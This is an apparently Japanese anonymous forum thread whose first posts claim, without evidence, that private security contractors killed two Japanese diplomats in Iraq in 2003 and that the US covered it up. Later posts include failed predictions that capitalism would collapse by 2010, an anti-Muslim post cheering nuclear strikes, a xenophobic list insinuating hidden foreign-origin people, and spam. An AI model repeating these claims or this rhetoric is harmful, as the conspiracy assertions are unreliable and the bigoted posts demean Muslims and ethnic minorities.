奥克彦・在英大使館参事官(45)と井ノ上正盛・在イラク大使館
3等書記官(30)は米軍の乱射によってこのように殺された可能性はないのか?


日刊ベリタ : 記事 : 雅子妃の病、きっかけは奥参事官の死 日本メディアが黙殺した英紙報道 「二人は親密な友人だった」
http://www.nikkanberita.com/read.cgi?id=200607080401426
0241国連な成しさん
垢版 |
07/03/11 15:31ID:xEiP0wOM
日本のジャーナリスト・大新聞は知識が無いので補足しよう。

奥参事官らを乗せた車を射撃したのは欧米のセキュリティー・コントラクターの可能性が高い。
セキュリティーコントラクターは米軍とは違う。
米軍が雇っている民間人であって、彼らはある程度自由な裁量で攻撃できる。

これは英国のセキュリティコントラクターが民間人を無差別に攻撃している映像であり、
奥参事官らを射撃した可能性もありうる。
http://www.youtube.com/watch?v=L4BnEVP8hc0

当時の目撃者の情報によると、最初に銃声を聞いて見たのは白と黒の4、5台のSUV車であり、
その最後尾を走っていたのは奥参事官を乗せた黒のランドクルーザーであった。

白のSUV車にはセキュリティーコントラクターが乗っていた可能性が高い。
というのも、現地の武装勢力が乗るのは古い乗用車やピックアップトラックが多く
高価なSUV車での移動はきわめて可能性が低い。

目撃者の証言では奥参事官らの車が銃撃された直後に米軍の車列が続いていたという。

つまりセキュリティーコントラクターはこの米軍の車列に専属で付き添っており、その先導をして
いた。彼らは不振な車両や人物に対しては射撃できる権限をもっており、黒のSUV車、つまり奥
参事官らが乗るランクルを不審車と判断し、攻撃した可能性が高い。

0242国連な成しさん
垢版 |
07/03/11 15:32ID:xEiP0wOM
米軍はこの事実をしっている。しかし協力関係にあるコントラクターとの関係、そしてこれがもし
公になれば当時自衛隊を派遣していた日本との協力関係にも影響が出るのは火を見るより明らかで
あった。そして何よりコントラクターの銃撃した証拠が残っていないので、反体制勢力の攻撃の
ように情報を操作した。

ランドクルーザーは左から銃撃されたあとが残っている。セキュリティー・コントラクターが
奥参事官らのランクルを追い越し際に射撃した、もしくは米軍の車列を追い越した黒のランクル
を不審な車と判断し射撃したと考えられる。

セキュリティー・コントラクターの存在を知っている日本人は極めて少なく、マスコミや政府関係者
でも知っている人はほとんどいないだろう。このためこの事件に疑念を持つものもすくなく、米軍の
発表する情報を鵜呑みにするしかなかったのである。

イラクのセキュリティー・コントラクターは、その性質上、自由に攻撃できる
組織であり、戦争犯罪による軍法会議もない。このためこうした民間人への攻撃が行われても
野放しな状態であり、米軍も見て見ぬ振りをするしかないのが現状だ。

日本の外交官を殺害したのは、武装勢力でも米軍でもなく、セキュリティ・コントラクターである。
0243国連な成しさん
垢版 |
07/03/11 17:40ID:M7omUYrg
パンの価格が安いのは政治的自由のない
人民の不満を抑えるためだって?
それじゃお前のカミさんがセックスのたびに
料金を請求しないのは性的自由のない
チンチンの不満を抑えるためかい?
カミさんへの支払いは「あからさまな支払い」より
「隠された支払い」を選んでるくせに
(゚Д゚)
あぁぽむぽむ
0245国連な成しさん
垢版 |
07/10/12 21:19ID:UKdAFlz6
a
0246国連な成しさん
垢版 |
07/10/15 00:33ID:???
誤射、快楽殺人と言えば、PMC

って展開ですな、ここ最近は
0247国連な成しさん
垢版 |
07/11/26 13:22ID:.yCdplaU
空前の大恐慌によってほぼ全ての企業がドミノ倒しのように倒産することだろう!

搾取的資本主義体制は花火のように爆発して崩壊する!

アメリカの経済学者 ラビ・バトラ氏

「どんなに遅くとも2000年までに共産主義は断末魔の苦しい革命を経て
崩壊し、2010年までに資本主義は崩壊する。」

「資本主義の崩壊(世界同時大恐慌)は住宅バブル・原油バブルの2つのバブルの崩壊に
端を発するNY株式市場の大暴落から始まるだろう。資本主義は花火のように爆発する。」

「世界同時大恐慌の入り口は2005年。そして2010年までに
『搾取的資本主義』は崩壊するだろう。」

(大恐慌・資本主義の崩壊によって)
「日本と世界は同時に崩壊する。」

ラビ・バトラ氏の恩師、サーカー師

「共産主義は早死にするだろう。資本主義は爆竹のように弾けて終焉するだろう。」

経済アナリスト 藤原直哉氏

「世界同時バブル崩壊によって世界金融システムは麻痺し、日本は飢餓に陥るだろう。」
0249国連な成しさん
垢版 |
08/01/04 15:19ID:XO4JPlIE
2010年までに資本主義は花火のように爆発して崩壊する!

アメリカの経済学者 ラビ・バトラ氏

「どんなに遅くとも2000年までに共産主義は断末魔の苦しい革命
を経て崩壊し、2010年までに資本主義は崩壊する。」

「資本主義の崩壊(世界同時大恐慌)は住宅バブル・原油バブルの2つの投機バブルの崩壊に
端を発するNY株式市場の大暴落から始まるだろう。資本主義は花火のように爆発する。」

「2010年までに世界同時大恐慌が発生して『搾取的資本主義』は崩壊する。」

「日本と世界は同時に崩壊する。大恐慌による混乱期を経てプラウト主義
経済による共存共栄の社会が実現するだろう。」

ラビ・バトラ氏の恩師 サーカー師

「共産主義は早死にするだろう。資本主義は爆竹のように弾けて終焉するだろう。」

イギリスのコラムニスト ウィル・ハットン氏

「今回のサブプライム問題に端を発する世界金融危機によって、市場原理
主義的経済政策は終わりを迎え、米英中心の覇権は崩壊するだろう。」

経済アナリスト 藤原直哉氏

「世界同時バブル崩壊によって世界金融システムは麻痺し、日本は飢餓に陥るだろう。」

経営コンサルタント 船井幸雄氏

「資本主義崩壊によって人々は農業に回帰し、自然と共生する新時代が幕開けするだろう。」
0253国連な成しさん
垢版 |
08/08/27 16:07ID:12yTltsg
アフガンで誘拐の伊藤和也さん、遺体で発見
0254国連な成しさん
垢版 |
08/08/27 17:16ID:.apHVvXA
>>253
…またかよ。
米としては日本の世論を押さえつつ新テロ特措法を
何としても通させなきゃいけない時。

米にとって最もよいタイミングで働くテロリスト(笑)
もうこの手は見透かされすぎだろうに。
0258国連な成しさん
垢版 |
09/02/20 12:13ID:???
   彡ミミミミ))彡彡)))彡)
  彡彡゙゙゙゙゙"゙゙""""""ヾ彡彡)
  ミ彡゙ .._    _   ミミミ彡
 ((ミ彡 '´ ̄ヽ '´/ ̄ ` ,|ミミ))
 ミ彡  ' ̄ ̄'  〈 ̄ ̄ .|ミミ彡
 ミ彡|  ) ) | | `( ( |ミ彡
((ミ彡 |  ( ( -し`) ) )|ミミミ  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   ゞ|  ) )  、,! 」( ( |ソ < もっと売国したいよー したいよー
     ヽ( ( ̄ ̄ ̄' ) )/    \_____________
  _/ |\、)    ' (イ
/      `──'´ // ̄`ヽ
   ヽ\\/ \/     \
    \               \ 
        容疑者        \
              l       \
          \   \      \
 \          \::::  \     \
   \         \:::::_ヽ__  _\
     \       ヽ/,  /_ ヽ/、 ヽ_
       \       // /<  __) l -,|__) >
         \     || | <  __)_ゝJ_)_>
           \   || | <  ___)_(_)_ >
             \_| |  <____ノ_(_)_ )
0259再臨のごるごるもあ ◆753Z/RLFiY
垢版 |
09/03/27 22:03ID:VGMvxyZ2
■■■■■■■■■■■■沖縄県は、駆逐艦10隻より市民図書館10個分を望んでいる■■■■■■■■■■■■
 悪化する沖縄米軍基地の風評被害に対して、われわれの用意した対案は次の通りである。
1.日本の国連常任理事国入りによる軍事基地の正当化。
2.軍事経済の偏りから生じる問題と捉え、大規模図書館を沖縄に整備することにより、先進的経済活動に寄与する。
3.軍事基地を北海道に移転し、北方領土問題の進展に貢献する。これにより軍事経済の正当化が期待できる。
4.琉球国独立による日米地位協定の解消と、基地問題を国際問題として提起し訴追すること。これは民主党の示す形式上の独立であり、実態的な問題は生じない。
5.アメリカ合衆国国民に対して、想像を絶するようなあらゆる思想的手段を講じて民族・人種・宗教差別廃止運動を扇動する。これにより軍事経済の世界同時的減退と日米地位協定の無効化を期待するものである。
以上、貴君の健闘を祈る。      
【沖縄】失われた未来【反戦支援】
http://www.nicovideo.jp/watch/sm6562262
0260国連な成しさん
垢版 |
09/05/20 04:28ID:???
    / ̄ ̄ ̄ ̄\
   (  人ニコ動命)         / ̄ ̄ ̄ ̄ ̄ ̄ ̄
    |ミ/  ー◎-◎-)        <ミンスと在日乙!自民党とアイマスは素晴らしい!
   (6     (_ _) ) カタカタカタ \_______
    |/ ∴ ノ  3 ノ   _____
    \_____ノ    |  | ̄ ̄\ \
   /       \__|  |    | ̄ ̄|
  /  \____    :|  |
0261国連な成しさん
垢版 |
09/12/01 14:36ID:.V4dtpuc
上位私大
青山学院大・学習院大・上智大・中央大・津田塾大・東京女子大・日本女子大・東京理科大・
法政大・明治大・立教大・関西学院大・同志社大・立命館大・関西大・★南山大・他
http://www.sundai.ac.jp/yobi/highschool/satenet/htm/level.htm
駿台予備校

難関私立大文系コース
私立大選抜
明治大・中央大・法政大・青山学院大・立教大・★南山大などの全国難関私立大学
http://prep.kawai-juku.ac.jp/daiju/2009/annai/kinki/ma-3.php?keiretu_code=3&class_code=5068&class_detail_code=5068
河合塾 近畿地区

■本部校(東京) 国立・難関私立文系コース
名古屋大・横浜国立大・横浜市立大 筑波大・立教大・★南山大など
■大阪校 国立・難関私立コース
北海道大・名古屋大・滋賀大 大阪府立大・神戸市外国語大・★南山大など
http://www.yozemikikoku.com/cource_list.html
代々木ゼミナール 帰国大学受験コース

「有名私大」グループ……明青立法中・関関同立、学習院、★南山の11大学。
http://www.toshin.com/news/topic.php?id=17
東進

ダイヤモンド社 『大学図鑑』 「名古屋の大学グループ ポジショニングマップ」
http://jkidx.sakura.ne.jp/up/up10/data/up0027.jpg

三大都市圏
http://ja.wikipedia.org/wiki/%E4%B8%89%E5%A4%A7%E9%83%BD%E5%B8%82%E5%9C%8F


三大都市圏の一角・中京圏の私大ではダントツで別格 MARCH・関関同立と肩を並べる大都市圏難関有名私立大学 南山大学万歳!
0262国連な成しさん
垢版 |
10/02/03 03:31ID:g2zZgDe.
進次郎伝説幕開け
0264国連な成しさん
垢版 |
2011/02/22(火) 19:40:37.75ID:fgpv6ML/
アメリカにはアラーの呪いが降りかかるだろう
0265 ◆4PVLKK7Xog
垢版 |
2011/02/23(水) 14:17:04.61ID:qRbJfkvB
a
0266 ◆FKYvVqcA7w
垢版 |
2011/02/23(水) 14:18:23.38ID:qRbJfkvB
a
0267 ◆.TO/z90RLI
垢版 |
2011/02/23(水) 14:20:54.58ID:qRbJfkvB
a
0268 ◆tExVepsVvg
垢版 |
2011/02/23(水) 14:22:00.11ID:qRbJfkvB
a
0269 ◆mm5vaWexVc
垢版 |
2011/02/23(水) 14:23:10.17ID:qRbJfkvB
a
0270国連な成しさん
垢版 |
2012/07/15(日) 18:22:45.26ID:???
アラブ人には、過去にムスリムに虐殺された
多神教徒(ミトラ教、仏教、古代エジプト太陽神、ヒンドゥー教)の
呪いが降りかかるだろう

いや、もう降りかかっている
だから18世紀以降植民地にされ、いまだに貧しい国がいっぱい

そしてアラーにはアメリカ、イスラエル、ヨーロッパ、インド、ロシアなど
全世界から核ミサイルが降りかかるだろう。
ざまぁ!
0272国連な成しさん
垢版 |
2015/01/15(木) 10:02:31.59ID:hIFFtZxJ
■■■
通名の方々:

テレビ局・新聞社・ラジオ局・出版社・
芸能人・テレビに出てる人・本を出している人・雑誌の表紙・芸術家・
スポーツ選手・アダルトビデオ・性風俗・ヤクザ・暴力団・部落(同和)・
教員・大学教授・ノーベル賞受賞者・医師・弁護士、検察官、裁判官・政治家・公務員・
経団連・経済同友会・公益法人・旧軍人・巣鴨プリズン・明治政府〜・
塾・予備校・専門学校・ 自動車教習所・ 商店街・飲食店・寺・2ちゃんねる・

■■■
0273国連な成しさん
垢版 |
2015/01/20(火) 00:14:04.47ID:oAiqKvqB
 /:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::://ヽ:::::::::::::::|
    l:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::// ヽ::::::::::::::l
    l:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::/:::「'ヽ::::::::::://   ヽ:::::::::::|  
    |::::::::::::::::::::::::::::::::::::::::::::::::::::::::::ノl:::ノ l:::::::/      ヽ::::::::|
   ノ:::::::::::::::::::::::::::::::::::::::::::::::::::::/ ゙゙  ノ:::/ ,,;;;;;;,,     ,,,,ヽ:::::l   
   ):::::::::::::::::::::::::::::::::::::::::::::::/    ノ/    ,'''i:  ('''__):::l  
  )::::::::::::::::::::::::::::::::::::::::::::::::::/       <●> ン:..<●>ヾ  
 1:::::::::::::::::::::::「 `┤l:::::::::::::::::l          ̄   ,  ヽ ̄ l    はぁ…はぁ…はぁ
  `l:::::::::::::::::::::ヽ  :l li:::::::::::::/        ヽ  /´   `l  |   
  ヽ::::::::::::::::::::::\_」 lヽ::::/         .l  !:-●,__ ノ  /  
  ノ:::::::::::::::::::::::::::ノ | l `゙゙           i ,,;;;;;;;;;;;;;;;;;;;;,  /ヽ  
,/ ヽ::::::::::::::::::::::(  l l::::::::..         /.:''/´ ̄_ソ  /  `ヽ
     ヽ:::::::::::::::ヽ | l:::::::::::...      /::// ̄ ̄_ソ  /    \
        ヽ:::::::\| l::::::::::::::::...    / :::.ゝ` ̄ ̄/ /       ヽ
           ヽ:::l l:::::::::::::::::::..      ̄ ̄;;'' /         ヽ
              l l;;;;;;:::::::::::::::.....;;;;............;;;;;;''ノ            l
              l l '''''''''''''''''''''''''''''''''''''' ̄l |             |

https://www.youtube.com/watch?v=z2qK2lhk9O0
0274国連な成しさん
垢版 |
2018/03/09(金) 19:12:44.31ID:XcuvxBBI
ユニークで個性的な自宅で稼げる方法
役に立つかもしれません
グーグル検索『金持ちになりたい 鎌野介メソッド』

6WWBI
0275国連な成しさん
垢版 |
2018/08/29(水) 14:27:17.57ID:tJTwvmvz
経済的にも自由が手に入りたいなら「立木のボボトイテテレ」で検索すればいいと思う

6OB
0277国連な成しさん
垢版 |
2023/08/31(木) 22:16:41.52ID:???
工エエェェ(  Д )⌒Y⌒Y⌒Y⌒Y⌒Y⌒...。....。コロコロ
レスを投稿する


ニューススポーツなんでも実況